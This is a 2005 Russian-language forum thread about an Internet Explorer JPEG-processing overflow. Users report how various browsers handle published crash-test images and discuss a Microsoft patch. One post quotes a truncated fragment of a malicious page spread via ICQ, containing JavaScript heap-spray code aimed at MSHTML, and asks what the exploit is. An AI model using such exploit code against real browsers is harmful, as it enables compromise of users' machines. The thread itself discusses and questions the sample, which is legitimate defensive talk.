Переполнение буфера при обработке JPEG файлов в Microsoft Internet ...

moonspell Guest	#21 Это нравится:0 Да/0 Нет 19.07.2005 04:08:23 -- moderator hat on -- Флэйм о моральном облике M.Zalewski в этом топике будет удаляться. Создавайте тему в "Общении". -- off --

Geek

Guest

#22

Это нравится:0 Да/0 Нет

19.07.2005 04:29:54

Цитата
ams666 пишет: вы ребята серьезно гоните.. вы больны.. на фоне софтофобии, неудовлетворенности в сексуальном плане и еще кучах мелких и не мелких компьютерных забабахов...

Доктор, бояться мелкомягкого софта нужно вам, а пользователям альтернативных ОС и браузеров эта проблема по барабану.
Да, кстати, почему вы здесь в 3 часа ночи - сказывается сексуальная неудовлетворенность и компьютерные прибабахи?
Похоже, вы правильно поставили себе диагноз.

kLiN

Guest

#23

Это нравится:0 Да/0 Нет

19.07.2005 13:43:54

Цитата
Geek пишет: а пользователям альтернативных ОС и браузеров эта проблема по барабану.

linux/opera.8.01.build.1204 = 100% cpu usage

deckard Guest	#24 Это нравится:0 Да/0 Нет 19.07.2005 13:46:05 а с Лисом как дела? тестировать не охота. уж он то надеюсь не уподобится Опере.

r00t

Guest

#25

Это нравится:0 Да/0 Нет

19.07.2005 17:13:36

Firefox/Linux:

Код
The image “http://lcamtuf.coredump.cx/crash/cmp_fencepost.jpg” cannot be displayed, because it contains errors.

Код
The image “http://lcamtuf.coredump.cx/crash/mov_fencepost.jpg” cannot be displayed, because it contains errors.

Код
The image “http://lcamtuf.coredump.cx/crash/oom_dos.jpg” cannot be displayed, because it contains errors.

Код
The image “http://lcamtuf.coredump.cx/crash/random.jpg” cannot be displayed, because it contains errors.

Код
The image “http://lcamtuf.coredump.cx/crash/timg-25715-21981-5458-6.jp g” cannot be displayed, because it contains errors.

Код
The image “http://lcamtuf.coredump.cx/crash/timg-4427-442-6251-10.jpg” cannot be displayed, because it contains errors.

Даже не ожидал такого от лисы.
Похоже, что скоро произойдет лавинооразный переход с IE на Firefox, благодаря нештатному сотруднику Mozilla Foundation Залевски ))), а вот ослолюбам веселые месяц-два, пока MS будет клепать патч на решето, <a href=http://lcamtuf.coredump.cx/crash/FANMAIL.txt rel="nofollow" target="_blank">гарантированы</a>. ))

Phoenix Guest	#26 Это нравится:0 Да/0 Нет 19.07.2005 17:18:16 на винде файрфокс тоже ведет себя вполне адекватно..

nmkr Guest	#27 Это нравится:0 Да/0 Нет 22.07.2005 15:29:02 http://www.microsoft.com/technet/security/Bulletin/MS05-036. mspx или я чего то не понимаю или это патч

r00t

Guest

#28

Это нравится:0 Да/0 Нет

22.07.2005 17:20:09

Цитата
nmkr пишет: http://wwхw.microsoft.com/technet/security/Bulletin/MS05-036 . mspx или я чего то не понимаю или это патч

Если это не какая-то другая бага в обработке .jpg, то он самый.

nmkr

Guest

#29

Это нравится:0 Да/0 Нет

22.07.2005 17:22:23

Цитата

r00t пишет:

Цитата
nmkr пишет: http://wwхw.microsoft.com/technet/security/Bulletin/MS05-036 . mspx или я чего то не понимаю или это патч

Если это не какая-то другая бага в обработке .jpg, то он самый.

дату видели ? 12.07 статья 18.07 непрофессионально господа, надо к Билли лазать изредка, а то я смотрю скомпилил запустил и ...

а может я не так что сделал ?

r00t

Guest

#30

Это нравится:0 Да/0 Нет

23.07.2005 00:44:02

Цитата
nmkr пишет: дату видели ? 12.07 статья 18.07 непрофессионально господа,

Да, действительно адвайзори старовато и бага другая, т.к. на картинках венду вышибает на разных либах - mshtml.dll и icc32.dll.

Цитата
nmkr пишет: надо к Билли лазать изредка, а то я смотрю скомпилил запустил и ...

Сидя в Linux как-то уже отвыкли лазать к Билли...
Я не непонял только при чем тут компиляция - уж не намекаете ли, что я виндоус-IE-киддис? Обижаешь, да? ))
Баги в осле меня интересуют по другой причине - наблюдение на сколько хватит терпения у мышей, которые плакали, кололись, но продолжали есть кактус(IE). )))

Кстати, поздравляю всех выживших с неделей (скорее всего, даже больше) отсидки на осле(IE), в котором все еще не пофикшена дырка, осталось еще совсем немного подождать - месяц или два и выйдет патч от M$, закрывающий ту дырку. ))

nmkr Guest	#31 Это нравится:0 Да/0 Нет 25.07.2005 09:50:13 да нет почему же совсем нет (пингвин клевый , однако)

Гость

Guest

#32

Это нравится:0 Да/0 Нет

19.09.2005 16:38:06

Сегодня получил ссылочку на какой-то эксплоит. Рассылка идет ботом по ICQ что нибудь типа ссылки на myphoto.jpg. Содержание картинки очень позабавило:

Код

<html>
<img src="1.jpg">
 <SCRIPT language="javascript">
  sMSHTML_heap_spray = unescape("%u0D0D%u0D0D");
  for(i=0; i<7; i++) sMSHTML_heap_spray += sMSHTML_heap_spray;
  try {
  apple(opener.document.createComment(sMSHTML_heap_spray));
  } catch(e) {
  window.open(document.location.href);
  }
......

Кто нибудь знает что это за експлоит? И ещё меня интересует вопрос, можно ли как нибудь проверить файл в инете на наличие эксплоита? Пытался проверить на сайтах извесных разработчиков антивирусов. Но ни один из них не посчитал это вирусом или вредоносной програмой( хотя даже радмина не дают запустить).

r00t

Guest

#33

Это нравится:0 Да/0 Нет

19.09.2005 22:41:16

Цитата
Гость пишет: И ещё меня интересует вопрос, можно ли как нибудь проверить файл в инете на наличие эксплоита?

А сам как думаешь? Если эксплоит написан и не числится в базах, то другого способа определить сплоит это или нет, кроме как раcковырять код или отправить файл тем, кто может его расковырять, не существует - волшебного сайта, который может сам определять еще неизвестные вирусы и сплоиты не существует.

Гость Guest	#34 Это нравится:0 Да/0 Нет 16.10.2005 12:26:00 ссылку покажи плз

Гость Guest	#35 Это нравится:0 Да/0 Нет 04.01.2006 09:52:21 Забавно, но IE в составе Windows Mobile 2003 (PocketPC) испытание выдержал... Не смог отобразить только http://lcamtuf.coredump.cx/crash/oom_dos.jpg и http://lcamtuf.coredump.cx/crash/random.jpg, а остальное я даже увидел - ни IE не упал, ни система не тормозила и не повисла!

Логин:
Пароль:
	Запомнить меня на этом компьютере

Забыли свой пароль?